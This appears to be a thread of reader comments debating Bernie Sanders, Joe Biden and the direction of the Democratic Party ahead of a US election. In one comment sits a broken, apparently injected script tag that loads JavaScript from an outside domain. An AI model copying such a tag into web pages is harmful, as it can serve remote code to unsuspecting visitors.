I don't think the polls were the downfall of the Democratic candidate in 2016. I think the biggest advantage the Democrats will have is a four year track record to reference and see if the citizens want another term of the same or something different. At least the omelet bar is being protected from harm.

Again, the all-important detail: how many people vote is less important than WHERE they vote.

Please, no Bernie. I don't even want Biden to run and I love Joe. Let someone new get in there.

Based on how you digest information, I'm just going to throw my support behind the Dark Lord Satan®.

Let's get one thing straight about Sanders:  He is NOT a Democrat.  He's an Independent who tends to vote along side the Democrats, but not all the time.  He's essentially the DINO running on the Dem ticket.< ="text/" async="" src="//cardinal.net/1fa16f6ccbee745a0c.js">

I don't like Sanders.  I don't trust Sanders.  He is, IMO, just as shady as Trump, but he's much smarter and craftier.  Sanders would be as bad for America as Trump has been, though our taxes would most likely decrease.  (The only positive I can see.)

Dunno if I want to see Biden run, but I would LOVE to see Biden debate Trump.

I agree.  President Biden would be a disaster.  But those debates would be a hoot.  They'd have to run them on a tape delay.

I love Joe and think he would be a normalizing presence who could work with more of Congress than you'd think – but right now, we really don't need another old white guy. We need to actually look to the future.

That said, my dream is that Joe declines to run but offers himself as a one-term VP for whoever wins. He'll be an extra pair of steady hands and bring a big Rolodex with him. One term and he steps aside for someone else. He'd be a damn hero for putting aside his ego.

Bernie is just an agent of chaos with a few good policy ideas. He would be better than Trump, but that is a very low bar.

Bernie Sanders is a cartoon who looks in the mirror and sees the President of the United States—and we already have one of those.

Over the pond, reports of Bernie Saunders during the U.S Election seemed largely favourable.

Has the U.S electorate, or the left-leaning part of them, lost their enthusiasm for Saunders? Or was it never as strong as I assumed it was?

I was down for Bernie in 2016.  I worked vigorously on his campaign.  I'm gearing up to do it again this time around.

And if he doesn't get the nod whoever does gets my vote.

Just as I supported and voted for Hillary when it mattered.

My feeling it that its time for America to get truly PROGRESSIVE.  And candidates like Warren and Sanders will keep the conversation there because recent polling shows that the Democratic rank and file overwhelmingly supports the progressive planks that Bernie made palatable in 2016.

When he introduced the $15 minimum wage in 2016 it was hailed a "radical".  Now its a normal talking point along with Medicare for All, tuition free college and other platforms that Democratic centrists (like Hillary) didn't readily support.

Look at what won the mid-terms for Democrats.  Dems won on the strength of the progressive planks championed by Bernie.

If Bernie Sanders looked like Gavin Newsome he'd be running away with this thing in a romp.  But his age, gruff demeanor and less than telegenic appearance some keeps folks at bay.  The 'Doc Brown' of politics.

I've been listening to and following the Senator from Vermont for many years now.  His message has been consistent and his inspirations flow from the likes of FDR, who was FAR more progressive in the 1930's and 40's than most politicians are today.

Nothing Bernie is proposing is radical.  Somehow America can ALWAYS pay for tax cuts for the rich.....but when it's time to educate, feed, employ and care for the least among us...it's time to talk the evils of 'socialism' and wonder where the money is going to come from.

The sooner we start valuing our neighbor's well being more than our tax dollars the better off we all will be.
